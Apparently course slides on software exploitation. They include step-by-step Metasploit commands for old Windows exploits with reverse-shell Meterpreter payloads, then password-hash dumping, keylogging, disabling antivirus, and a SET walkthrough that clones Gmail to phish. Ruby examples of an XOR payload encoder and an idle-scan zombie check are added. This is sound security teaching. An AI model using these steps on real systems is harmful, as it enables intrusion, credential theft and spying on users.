Exploitation
Using any unauthorized tools will get you fired, arrested, deported, smitten by God, etc. This course is not intended to make you a cracker.
However, the most dangerous and very effective attacks used by malicious users today are
system allowing an attacker to violate the confidentiality, integrity, availability, access control, consistency or audit mechanisms of the system or the data and applications it hosts
Buffer overflows
Memory leaks
Deadlocks
Arithmetic overflow
Accessing protected memory (access violation)
etc.
Exploits
Regardless of the type of software bug we are speaking of, an exploit:
Triggers an unexpected condition in the program, generating an event that the program is not designed to recover from successfully
Redirects execution in a controlled way to run the payload
The payload is a sequence of code that is executed when the vulnerability is triggered.
To make things clear, an exploit is really broken up into two parts: EXPLOIT = Vulnerability + Payload
Understanding Payloads
A payload is specific to the target platform: a Win32 payload will not work on Linux (even if we are exploiting the same bug)
Common payload types:
exec: execute a command or program on the remote system
download_exec: download a file from a URL and execute it
upload_exec: upload a local file and execute it
adduser: add a user to the system accounts
Shell: /bin/sh on Unix, the command prompt cmd.exe on Windows
Bind shells (the target listens on a port, which inbound filtering often blocks) and reverse shells (the target connects back to the attacker's address, the LHOST set in the examples below)
Auxiliaries:
Encoders
Encode the payload before it is sent, originally to remove bytes the vulnerable input path cannot carry (for example a NUL byte in a string-copy overflow); a small decoder stub prepended to the payload restores it at run time
As a side effect this can evade signature-based detection by antivirus, firewalls, IDS, IPS, etc.; against current AV this is unreliable and not something to count on
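To make the encoder slide concrete, here is an added example written for this page (not code from Metasploit) of the simplest kind of encoder Metasploit ships: a single-byte XOR over the payload, plus the classic 20-byte x86 jmp/call/pop decoder stub that undoes it at run time. It is in Ruby because that is the language Metasploit modules are written in. The payload bytes are a constructed placeholder, not a working shellcode; the bad-character set (just NUL) and the function names are this example's choices; the stub is built and checked for bad characters but never executed here.

```ruby
# Added example, not Metasploit code: a single-byte XOR encoder that picks a key
# such that neither the encoded payload nor the decoder stub contains a "bad"
# byte (here 0x00, which a strcpy()-style overflow would stop at).

# Constructed placeholder "shellcode" containing a NUL; not a working payload.
SAMPLE_PAYLOAD = [
  0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
  0x68, 0x2f, 0x62, 0x69, 0x6e, 0x00, 0xcd, 0x80 # 0x00 would truncate a strcpy()
].pack('C*').freeze

DEFAULT_BAD_CHARS = [0x00].freeze

# Classic 20-byte x86 "jmp/call/pop" decoder stub: at run time it obtains its own
# address with call/pop, XORs `len` bytes after itself with `key`, then jumps into
# the decoded payload. Built here for the bad-character check; not executed.
def decoder_stub(key, len)
  [0xeb, 0x0d,                   # jmp short +0x0d  (to the call below)
   0x5e,                         # pop esi          (esi = address of encoded payload)
   0x31, 0xc9,                   # xor ecx, ecx
   0xb1, len,                    # mov cl, len
   0x80, 0x36, key,              # xor byte [esi], key
   0x46,                         # inc esi
   0xe2, 0xfa,                   # loop -6          (back to the xor)
   0xeb, 0x05,                   # jmp short +5     (into the decoded payload)
   0xe8, 0xee, 0xff, 0xff, 0xff  # call -0x12       (to pop esi; pushes payload address)
  ].pack('C*')
end

def xor_bytes(data, key)
  data.bytes.map { |b| b ^ key }.pack('C*')
end

def bad_chars?(data, bad_chars)
  !(data.bytes & bad_chars).empty?
end

# Try every single-byte key; accept the first one for which the stub plus the
# encoded payload is free of bad characters. Returns [blob, key].
def xor_encode(payload, bad_chars = DEFAULT_BAD_CHARS)
  unless (1..255).cover?(payload.bytesize)
    raise ArgumentError, 'payload length must fit the stub\'s 8-bit loop counter'
  end
  (1..255).each do |key|
    stub = decoder_stub(key, payload.bytesize)
    blob = stub + xor_bytes(payload, key)
    return [blob, key] unless bad_chars?(blob, bad_chars)
  end
  raise 'no single-byte XOR key avoids the bad characters'
end

# What the stub does at run time, done in Ruby so the round trip can be checked.
def xor_decode(blob, key)
  xor_bytes(blob[20..-1], key)
end

if __FILE__ == $PROGRAM_NAME
  blob, key = xor_encode(SAMPLE_PAYLOAD)
  puts 'key=0x%02x, %d bytes, bad chars left: %s' % [key, blob.bytesize, bad_chars?(blob, DEFAULT_BAD_CHARS)]
  puts "round trip ok: #{xor_decode(blob, key) == SAMPLE_PAYLOAD}"
end
```

Two things the code makes visible that the slide does not: the key has to avoid every byte value that appears in the payload (XOR-ing a byte with itself yields the forbidden 0x00), and the stub itself must be checked, since it carries the key and the length as literal bytes. Metasploit's real encoders do the same search with richer bad-character lists taken from the exploit module.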
Metasploit Framework
Set of exploits to launch against a box
Potentially own the box
Build a real exploit for your own purposes
General interface for testing & writing exploits
Will not make you a cracker
MSFConsole
The most efficient, powerful, all-in-one centralized frontend interface for penetration testers to use Metasploit
$ cd /pentest/exploits/framework/
$ ./msfconsole
msf > help
msf > show exploits
msf > show payloads
msf > show encoders
msf > show -h
Metasploit: getting a shell
Meterpreter
Upload/download files
Read/write to the registry
Change file access times
Execute programs
Exploits
ms08-067: October 2008, Server service (NetAPI); 1/3 of machines still vulnerable at the time of the course
ms03-026: September 2003, RPC DCOM
MSFConsole
$ ./msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
RHOST is the target; LHOST is the attacker's own address, which a reverse payload connects back to
MSFConsole
$ ./msfconsole
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > show options
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set LHOST 192.168.1.10
msf exploit(ms03_026_dcom) > set RHOST 192.168.1.17
msf exploit(ms03_026_dcom) > exploit
MSFConsole
$ ./msfconsole
msf > use exploit/windows/browser/ms10_046_icon_dllloader
msf exploit(ms10_046_icon_dllloader) > show options
msf exploit(ms10_046_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_046_icon_dllloader) > set LHOST 192.168.1.10
msf exploit(ms10_046_icon_dllloader) > exploit
This is a client-side (browser) exploit, so there is no RHOST: the module starts a web server and prints the URL it serves. In the victim's browser, enter the IP address of the attacker (that URL)
MSFConsole
msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > show payloads
msf exploit(ms10_061_spoolss) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_061_spoolss) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_061_spoolss) > set RHOST [TARGET IP]
msf exploit(ms10_061_spoolss) > exploit
Information gathering
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
msf auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
msf auxiliary(ipidseq) > set THREADS 50
msf auxiliary(ipidseq) > run
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
ipidseq reports which hosts answer with an incremental IP ID sequence; such a host can serve as the "zombie" for an nmap idle scan (-sI), here 192.168.1.109 scanning the target 192.168.1.155 without the scanner's own address appearing in the probes. msfconsole passes commands it does not know, such as nmap, to the underlying shell
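The ipidseq step above only matters because of what it looks for: a host whose IP ID field goes up by a fixed small step on every packet it sends. The following added example, written for this page and not taken from the Metasploit module or from nmap, shows that classification step in Ruby (Metasploit's language) over constructed IP ID samples. The category names, the numeric thresholds and the sample hosts are this example's own simplifications.

```ruby
# Added example, not code from Metasploit or nmap: classify a host's IP ID
# behaviour from the IDs seen in a series of its replies. An idle scan needs a
# "zombie" whose IP ID rises by a fixed small step for every packet it sends, so
# that probes reflected off it show up as extra increments at the scanner.
# Thresholds and category names are this example's own.

IPID_MODULUS = 65_536 # the IP ID field is 16 bits and wraps

# Differences between consecutive IDs, modulo 2^16, so 65535 -> 0 is a step of 1.
def ipid_diffs(ids)
  ids.each_cons(2).map { |a, b| (b - a) % IPID_MODULUS }
end

def classify_ipid(ids)
  return :insufficient_samples if ids.size < 3
  return :all_zeros if ids.all?(&:zero?) # host always sends IP ID 0: useless as a zombie

  diffs = ipid_diffs(ids)
  return :constant if diffs.all?(&:zero?) # same non-zero ID every time

  # Ideal zombie: every step identical and small (almost always exactly 1).
  return :incremental if diffs.uniq.size == 1 && diffs.first.between?(1, 8)

  # Some stacks count in host byte order but emit the field byte-swapped, so the
  # value on the wire grows by a multiple of 256 per packet. Still usable.
  if diffs.all? { |d| (d % 256).zero? && d.between?(256, 2048) }
    return :broken_little_endian_incremental
  end

  # Small but uneven positive steps: the host is sending other traffic between
  # our probes, which would hide the increments an idle scan relies on.
  return :random_positive_increments if diffs.all? { |d| d.between?(1, 1000) }

  :randomized # modern stacks randomise IP IDs
end

# Only steadily incrementing hosts are worth handing to `nmap -sI`.
def usable_zombie?(ids)
  %i[incremental broken_little_endian_incremental].include?(classify_ipid(ids))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed samples, as if read from five replies per host.
  samples = {
    '192.168.1.109' => [65_534, 65_535, 0, 1, 2], # incremental across the 16-bit wrap
    '192.168.1.1'   => [0, 0, 0, 0, 0],
    '192.168.1.20'  => [0x1200, 0x1300, 0x1400, 0x1500, 0x1600],
    '192.168.1.30'  => [12_034, 50_923, 3, 41_000, 9_876],
    '192.168.1.40'  => [100, 103, 104, 110, 111]
  }
  samples.each do |host, ids|
    printf("%-15s %-34s zombie? %s\n", host, classify_ipid(ids), usable_zombie?(ids))
  end
end
```

The wrap-around case is the one that trips up naive implementations: a zombie whose counter passes 65535 is still perfectly incremental, which is why the differences are taken modulo 2^16 rather than as plain subtraction.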
Meterpreter
A Metasploit payload
Injects itself into the target process as a DLL, in memory
Writes nothing to disk by default and lives inside an existing process, to cover your tracks
MSFConsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > show payloads
...
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
...
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit
Meterpreter session
meterpreter > run hashdump          (dump the password hashes; needs SYSTEM privileges, so migrate into a SYSTEM process first if it fails)
meterpreter > ps                    (list processes)
meterpreter > migrate 3172          (move into another process, by PID)
meterpreter > getpid
meterpreter > getuid
meterpreter > use priv              (load the priv extension; needed for keystroke capture)
meterpreter > keyscan_start         (start capturing keystrokes; captures the keyboard of the desktop the current process belongs to, so migrate into the user's explorer.exe to see what the user types)
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > screenshot
meterpreter > shell                 (drop into a cmd.exe shell on the target)
meterpreter > run vnc
meterpreter > run killav            (kill the antivirus)
There is a "social engineering" aspect to most hacking: tricking a user into making a mistake that lets you in
Clicking a link
Ignoring an error message
Opening an attachment
etc.
Today's Attack
Target: Win 7
Vuln: Java 0-day
Attacker: evil web server with a cloned Gmail page
Social Engineering
http://www.secmaniac.com/blog/2011/01/01/bypass-windows-uac/
Commands
cd /pentest/exploits/SET
./set
Enter option 1: Social Engineering Attacks
Enter option 2: Website Attack Vectors
Enter option 1: The Java Attack Method
Enter option 2: Site Cloner
Enter the URL: https://gmail.com
It asks "What payload do you want to generate:" and lists 11 choices; press Enter for the default: 2. (Windows Reverse_TCP Meterpreter)
It shows a list of 16 encodings to try and bypass AV; press Enter for the default
It asks you to "Enter the PORT of the listener (enter for default):"; press Enter for the default
It asks whether you want to create a Linux/OSX reverse_tcp payload; enter no
It now shows blue text saying:
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this prompt:
msf exploit(handler) >
GAME OVER
The target is now owned. We can:
Capture screenshots
Capture keystrokes
Turn on the microphone and listen
Turn on the webcam and take photos
Steal password hashes
etc.
How to defend yourself:
Get antivirus
Install patches (when they exist)
Keep image-based backups so you can recover after an infection